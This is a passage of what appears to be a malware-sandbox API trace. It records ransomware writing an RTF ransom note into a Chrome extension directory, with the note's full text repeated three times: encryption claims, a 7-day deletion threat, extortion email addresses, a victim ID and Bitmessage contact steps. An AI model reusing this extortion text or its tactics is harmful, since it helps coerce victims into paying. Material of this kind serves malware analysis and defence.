BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.041] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.042] CloseHandle (hObject=0x294) returned 1 [0285.042] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\#readme_eman#.rtf")) returned 0xffffffff [0285.042] GetLastError () returned 0x2 [0285.042] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.044] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.045] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.045] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 